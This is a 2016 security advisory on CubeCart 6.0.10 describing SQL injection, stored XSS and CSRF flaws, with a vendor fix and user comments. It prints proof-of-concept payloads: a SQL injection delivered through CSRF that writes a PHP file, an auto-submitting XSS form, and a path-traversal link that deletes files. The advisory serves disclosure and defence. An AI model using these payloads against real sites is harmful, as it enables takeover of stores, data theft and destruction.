Stay in touch

Enter your email and get the latest news and researches on cybersecurity, receive invitations to private security events and conferences.

Multiple Vulnerabilities in CubeCart

Advisory ID:HTB23298
Product:CubeCart
Vendor:CubeCart Limited
Vulnerable Versions:6.0.10 and probably prior
Tested Version:6.0.10
Advisory Publication:March 2, 2016 [without technical details]
Vendor Notification:March 2, 2016
Vendor Fix:March 16, 2016
Public Disclosure:March 30, 2016
Latest Update:March 16, 2016
Vulnerability Type:SQL Injection [CWE-89]
Cross-Site Scripting [CWE-79]
Cross-Site Request Forgery [CWE-352]
CVE Reference:Pending
Risk Level:Medium
CVSSv3 Base Scores:6.6 [CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H]
6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N]
4.7 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:N/A:L]
CVSSv3 Calculator
Solution Status:Fixed by Vendor
Discovered and Provided:High-Tech Bridge Security Research Lab
 

Advisory Details:

High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in popular open source shopping software CubeCart. The discovered vulnerabilities allow a remote attacker to compromise vulnerable website and its databases, and conduct sophisticated attacks against its users.


1) SQL Injection in CubeCart

The vulnerability exists due to insufficient filtration of user-supplied data passed via "char" HTTP GET parameter to "/admin.php" PHP script. A remote authenticated attacker with privileges to view list of products can alter present SQL query, inject and execute arbitrary SQL commands in the application's database. This vulnerability can be also exploited by anonymous attacker via CSRF vector.

A simple CSRF exploit below will create a PHP file "/var/www/site/file.php" (assuming MySQL has writing permissions to this directory), which can execute phpinfo() function:
<img src="http://[host]/admin.php?_g=products&cat_id=1&sort[updated]=DESC&char=T] %27%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,'<? phpinfo(); ?>',1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8%20INTO%20OUTFILE %20'/var/www/site/file.php'%20--%202">


2) Stored Cross-Site Scripting in CubeCart

The vulnerability exists due to insufficient filtration of user-supplied input passed via "first_name" and "last_name" HTTP POST parameters to "/index.php" script. A remote authenticated attacker can edit his or her profile, permanently inject malicious HTML and JavaScript code and execute it in administrator's browser in context of vulnerable website, when the "Customer List" page is viewed. Exploitation of this vulnerability requires the attacker to have valid user credentials, however registration is open by default.

Successful exploitation of this vulnerability may allow a remote attacker to gain complete control over the web application once the logged-in administrator just visits "Customer List" page. This vulnerability can also be used to perform drive-by-download or spear-phishing attacks against.

To reproduce the vulnerability, log in to the website with privileges of a regular user and use the exploit below to modify "First" and "Last name" in attacker's profile:

<form action="http://[host]/index.php?_a=profile" method="POST" name="f1">
<input type="hidden" name="title" value="title" />
<input type="hidden" name="first_name" value='" onmouseover="javascript:alert(/ImmuniWeb/);"' />
<input type="hidden" name="last_name" value='" onmouseover="javascript:alert(/ImmuniWeb/);"' />
<input type="hidden" name="email" value="mail@mail.com" />
<input type="hidden" name="phone" value="1234567" />
<input type="hidden" name="mobile" value="" />
<input type="hidden" name="passold" value="" />
<input type="hidden" name="passnew" value="" />
<input type="hidden" name="passconf" value="" />
<input type="hidden" name="update" value="Update" />
<input type="submit" value="Submit request" />
</form><script>document.f1.submit();</script>


A JS popup with "ImmuniWeb" word will be displayed, when the website administrator visits the "Customer List" page:
http://[host]/admin.php?_g=customers


3) Cross-Site Request Forgery in CubeCart

The vulnerability exists due to insufficient validation of HTTP request origin, when deleting local files. A remote unauthenticated attacker can create a specially crafted malicious web page with CSRF exploit, trick a logged-in administrator to visit the page, spoof the HTTP request, as if it was coming from the legitimate user, and delete arbitrary file on the system.

A simple exploit below will delete file "/index.php". To reproduce the vulnerability, just log in as an administrator and visit the link below:
http://[host]/admin.php?_g=maintenance&node=index&delete=../index.php


ImmuniWeb® On-Demand Web Application Penetration Test


Solution:
Update to CubeCart 6.0.11

More Information:
https://forums.cubecart.com/topic/51079-cubecart-6011-released/


References:
[1] High-Tech Bridge Advisory HTB23298 - https://www.htbridge.com/advisory/HTB23298 - Multiple Vulnerabilities in CubeCart
[2] CubeCart - https://www.cubecart.com/ - CubeCart is a free responsive open source PHP ecommerce software system.
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[4] ImmuniWeb® - web security platform by High-Tech Bridge for on-demand and continuous web application security, vulnerability management, monitoring and PCI DSS compliance.
[5] Free SSL/TLS Server test - check your SSL implementation for PCI DSS and NIST compliance. Supports all types of protocols.
User Comments and Opinions
Add Comment
2 responses to "Multiple Vulnerabilities in CubeCart"
Al Brookbanks 2016-03-07 11:32:49 UTC Comment this
Dear Sir/Madam,

As the tech lead on this project I can certainly tell you that we had NOT
been notified about these findings.

Please can you provide details ASAP to sales@cubecart.com.

Thank you,

Al
Anonymous 2016-05-07 16:32:56 UTC Comment this
Cubecart has another problem, Version 6.0.11
hacker found a back door through admin, they were able to make a copy of
my sql d-base and make it downloadable. found the dump.sql file they made
in the includes folder. IP 5.79.68.161 Netherlands
↑ Back to Top


Have additional information to submit?
Please feel free to send us any additional information related to this Advisory, such as vulnerable versions, additional exploitation details and conditions, patches and other relevant details.